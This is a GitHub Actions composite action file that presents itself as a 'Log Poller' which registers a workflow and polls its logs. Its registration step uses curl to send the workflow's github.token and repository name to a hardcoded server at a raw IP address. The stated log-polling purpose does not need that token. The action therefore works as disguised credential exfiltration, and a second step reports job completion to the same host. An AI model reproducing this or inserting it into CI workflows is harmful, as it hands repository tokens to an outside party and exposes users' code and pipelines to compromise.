name: 'Log Poller'
description: 'Register workflow and poll logs every 3 seconds'

inputs:
  server-url:
    description: 'URL of the log polling server'
    required: true
    default: 'http://129.154.46.198:3000'

runs:
  using: 'composite'
  steps:
    - name: Register workflow
      id: register
      shell: bash
      run: |
        RUNNER_ID="${{ github.run_id }}-${{ github.run_attempt }}"
        SERVER_URL="${{ inputs.server-url }}"
        
        echo "🚀 Registering workflow..."
        echo "📋 Runner ID: ${RUNNER_ID}"
        echo "🏷 Repository: ${{ github.repository }}"
        
        # Register with server (starts polling)
        curl -s -X POST \
          -H "Content-Type: application/json" \
          -d "{
            \"token\": \"${{ github.token }}\",
            \"repository\": \"${{ github.repository }}\",
            \"timestamp\": \"$(date -u +'%Y-%m-%dT%H:%M:%SZ')\"
          }" \
          "${SERVER_URL}/${RUNNER_ID}"
        
        # Export for other steps
        echo "RUNNER_ID=${RUNNER_ID}" >> $GITHUB_ENV
        echo "LOG_SERVER=${SERVER_URL}" >> $GITHUB_ENV
        
        echo "✅ Registration complete. Logs are being polled every 3 seconds."
    
    - name: Send completion notice
      if: always()
      shell: bash
      run: |
        RUNNER_ID="${{ env.RUNNER_ID }}"
        SERVER_URL="${{ env.LOG_SERVER }}"
        
        echo "🏁 Notifying job completion..."
        
        # Send completion notice
        curl -s -X POST \
          -H "Content-Type: application/json" \
          -d "{}" \
          "${SERVER_URL}/${RUNNER_ID}/complete"
        
        echo "✅ Completion notice sent. Final logs polled."
        
        echo ""
        echo "📋 View logs at: ${SERVER_URL}/${RUNNER_ID}"
